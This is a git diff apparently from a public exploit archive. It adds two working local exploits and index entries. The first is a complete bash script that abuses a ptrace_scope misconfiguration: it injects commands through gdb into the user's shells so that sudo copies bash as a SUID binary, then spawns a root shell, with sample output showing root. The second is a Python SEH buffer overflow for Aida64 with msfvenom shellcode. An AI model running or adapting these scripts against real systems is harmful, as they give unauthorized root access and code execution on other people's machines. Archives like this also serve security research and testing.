diff --git a/exploits/linux/local/40953.sh b/exploits/linux/local/40953.sh index 169b793f5..b00215e3a 100755 --- a/exploits/linux/local/40953.sh +++ b/exploits/linux/local/40953.sh @@ -2,7 +2,7 @@ # # Exploit Title: Vesta Control Panel 0.9.7 <= 0.9.8-16 Local Privilege Escalation Exploit # Google Dork: vesta control panel inurl:8083 -# Exploit Author: Luka Pusic @lukapusic, Jaka Hudoklin @offlinehacker +# Exploit Author: Luka Pusic, Jaka Hudoklin @offlinehacker # Vendor Homepage: http://vestacp.com/ # Software Link: https://github.com/serghey-rodin/vesta # Version: 0.9.7 - 0.9.8-16 diff --git a/exploits/linux/local/46989.sh b/exploits/linux/local/46989.sh new file mode 100755 index 000000000..cd5d8f395 --- /dev/null +++ b/exploits/linux/local/46989.sh @@ -0,0 +1,96 @@ +#!/usr/bin/env bash + +####################################################### +# # +# 'ptrace_scope' misconfiguration # +# Local Privilege Escalation # +# # +####################################################### + +# Affected operating systems (TESTED): +# Parrot Home/Workstation 4.6 (Latest Version) +# Parrot Security 4.6 (Latest Version) +# CentOS / RedHat 7.6 (Latest Version) +# Kali Linux 2018.4 (Latest Version) + +# Authors: Marcelo Vazquez (s4vitar) +# Victor Lasa (vowkin) + +#┌─[s4vitar@parrot]─[~/Desktop/Exploit/Privesc] +#└──╼ $./exploit.sh +# +#[*] Checking if 'ptrace_scope' is set to 0... [√] +#[*] Checking if 'GDB' is installed... [√] +#[*] System seems vulnerable! [√] +# +#[*] Starting attack... +#[*] PID -> sh +#[*] Path 824: /home/s4vitar +#[*] PID -> bash +#[*] Path 832: /home/s4vitar/Desktop/Exploit/Privesc +#[*] PID -> sh +#[*] Path +#[*] PID -> sh +#[*] Path +#[*] PID -> sh +#[*] Path +#[*] PID -> sh +#[*] Path +#[*] PID -> bash +#[*] Path 1816: /home/s4vitar/Desktop/Exploit/Privesc +#[*] PID -> bash +#[*] Path 1842: /home/s4vitar +#[*] PID -> bash +#[*] Path 1852: /home/s4vitar/Desktop/Exploit/Privesc +#[*] PID -> bash +#[*] Path 1857: /home/s4vitar/Desktop/Exploit/Privesc +# +#[*] Cleaning up... [√] +#[*] Spawning root shell... [√] +# +#bash-4.4# whoami +#root +#bash-4.4# id +#uid=1000(s4vitar) gid=1000(s4vitar) euid=0(root) egid=0(root) grupos=0(root),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(debian-tor),124(bluetooth),136(scanner),1000(s4vitar) +#bash-4.4# + + +function startAttack(){ + tput civis && pgrep "^(echo $(cat /etc/shells | tr '/' ' ' | awk 'NF{print $NF}' | tr '\n' '|'))$" -u "$(id -u)" | sed '$ d' | while read shell_pid; do + if [ $(cat /proc/$shell_pid/comm 2>/dev/null) ] || [ $(pwdx $shell_pid 2>/dev/null) ]; then + echo "[*] PID -> "$(cat "/proc/$shell_pid/comm" 2>/dev/null) + echo "[*] Path $(pwdx $shell_pid 2>/dev/null)" + fi; echo 'call system("echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1")' | gdb -q -n -p "$shell_pid" >/dev/null 2>&1 + done + + if [ -f /tmp/bash ]; then + /tmp/bash -p -c 'echo -ne "\n[*] Cleaning up..." + rm /tmp/bash + echo -e " [√]" + echo -ne "[*] Spawning root shell..." + echo -e " [√]\n" + tput cnorm && bash -p' + else + echo -e "\n[*] Could not copy SUID to /tmp/bash [✗]" + fi +} + +echo -ne "[*] Checking if 'ptrace_scope' is set to 0..." +if grep -q "0" < /proc/sys/kernel/yama/ptrace_scope; then + echo " [√]" + echo -ne "[*] Checking if 'GDB' is installed..." + if command -v gdb >/dev/null 2>&1; then + echo -e " [√]" + echo -e "[*] System seems vulnerable! [√]\n" + echo -e "[*] Starting attack..." + + startAttack + + else + echo " [✗]" + echo "[*] System is NOT vulnerable :( [✗]" + fi +else + echo " [✗]" + echo "[*] System is NOT vulnerable :( [✗]" +fi; tput cnorm \ No newline at end of file diff --git a/exploits/windows/local/46991.py b/exploits/windows/local/46991.py new file mode 100755 index 000000000..51e0694a2 --- /dev/null +++ b/exploits/windows/local/46991.py @@ -0,0 +1,55 @@ +#!/usr/bin/python +########################################################################################################## +# Exploit : Aida64 6.00.5100 'Log to CSV File' Local SEH Buffer Overflow Exploit +# Author : Nipun Jaswal +# Tested On : Windows 7 Home Basic(x86) +# Version : 6.00.5100 +# Release Date : 31/May/2019 +# Build : 21/May/2019 +# Vendor Homepage: https://www.aida64.com/downloads +# Software Link: https://www.aida64.com/products/aida64-engineer +# CVE : CVE-2019- + +########################################################################################################## +##################################Steps to Reproduce###################################################### +#1) Open Aida64 Engineer +#2) Navigate to File-> Preferences +#3) Logging --> 'Log Sensor Reading to CSV log File' +#4) Paste the Content from exploit.txt to the 'Log Sensor Reading to CSV log File' field +#5) Press Apply-> OK +#6) Exit the Application via File-->Exit +##########################################//SHELLCODE//################################################### +# msfvenom -p windows/messagebox TEXT=NIPUN-NIPUN -b '\x00\x0a\x0d' -f py --smallest +buf = "" +buf += "\xb8\xb6\xf7\x5f\x31\xda\xd5\xd9\x74\x24\xf4\x5f\x2b" +buf += "\xc9\xb1\x42\x31\x47\x14\x83\xef\xfc\x03\x47\x10\x54" +buf += "\x02\x86\xda\x03\x34\x4d\x39\xc7\xf6\x7c\xf3\x50\xc8" +buf += "\x49\x90\x15\x5b\x7a\xd2\x5f\x90\xf1\x92\x83\x23\x43" +buf += "\x53\x30\x4d\x6c\xe8\x70\x8a\x23\xf6\x09\x19\xe2\x07" +buf += "\x20\x22\xf4\x68\x49\xb1\xd3\x4c\xc6\x0f\x20\x06\x8c" +buf += "\xa7\x20\x19\xc6\x33\x9a\x01\x9d\x1e\x3b\x33\x4a\x7d" +buf += "\x0f\x7a\x07\xb6\xfb\x7d\xf9\x86\x04\x4c\xc5\x15\x56" +buf += "\x2b\x05\x91\xa0\xf5\x4a\x57\xae\x32\xbf\x9c\x8b\xc0" +buf += "\x1b\x75\x99\xd9\xe8\xdf\x45\x1b\x05\xb9\x0e\x17\x92" +buf += "\xcd\x4b\x34\x25\x39\xe0\x40\xae\xbc\x1f\xc1\xf4\x9a" +buf += "\xc3\xb3\x37\x50\xf3\x1a\x63\x1c\xe1\xd4\x49\x77\x64" +buf += "\xa8\x43\x64\x2a\xdd\xc4\x8b\x34\xe2\x73\x36\xcf\xa6" +buf += "\xfd\x61\x2d\xab\x86\x8e\x96\x1e\x60\x20\x29\x61\x8f" +buf += "\xb4\x93\x96\x07\xab\x77\x87\x96\x5b\xbb\xf5\x36\xf8" +buf += "\xd3\x8c\x35\x65\x56\x5f\x62\xed\xca\xbb\x9e\x67\x14" +buf += "\x95\x61\x22\xdd\x93\x5f\x9d\x66\x0b\xfd\x53\x25\xcb" +buf += "\x1d\x48\x07\x3c\x42\x6f\x58\x43\x14\xe0\xdf\xe4\xc4" +buf += "\x96\x7e\x72\x61\x25\xe9\x31\x0c\xda\x9a\xf8\x15\x94" +buf += "\x01\xdf\xa3\x2c\x5a\x77\xe3\x7b\xd3\xd0\x6b\xca\xc6" +buf += "\xae\x22\xba\x56\x66\xe4\x6f\x56\xb1\x8c\xdc\xbc\x4a" +buf += "\x05\x3d\x8d\x9e\x47\xed\xbf\x4c\x98\xc1\x71\xb1\x36" + +##########################################//SHELLCODE//################################################### +junk= "\x41" * (1106 - len(buf)) +seh = "\x87\xe2\x1d\x01" #0x011de287 - [aida64.exe] +nseh = "\xeb\xf8\x90\x90" +buffer = junk + buf +"\xe9\xdd\xfe\xff\xff\xcc" + nseh + seh +handle = open("exploit.txt","w") +handle.write(buffer) +handle.close() +##########################################//END//######################################################### \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index adcf439a5..e5a6c09e5 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10545,6 +10545,8 @@ id,file,description,date,author,type,platform,port 46976,exploits/windows/local/46976.txt,"Microsoft Windows - AppX Deployment Service Local Privilege Escalation (3)",2019-06-07,SandboxEscaper,local,windows, 46978,exploits/linux/local/46978.sh,"Ubuntu 18.04 - 'lxd' Privilege Escalation",2019-06-10,s4vitar,local,linux, 46988,exploits/windows/local/46988.txt,"Pronestor Health Monitoring < 8.1.11.0 - Privilege Escalation",2019-06-13,PovlTekstTV,local,windows, +46989,exploits/linux/local/46989.sh,"CentOS 7.6 - 'ptrace_scope' Privilege Escalation",2019-06-14,s4vitar,local,linux, +46991,exploits/windows/local/46991.py,"Aida64 6.00.5100 - 'Log to CSV File' Local SEH Buffer Overflow",2019-06-14,"Nipun Jaswal",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139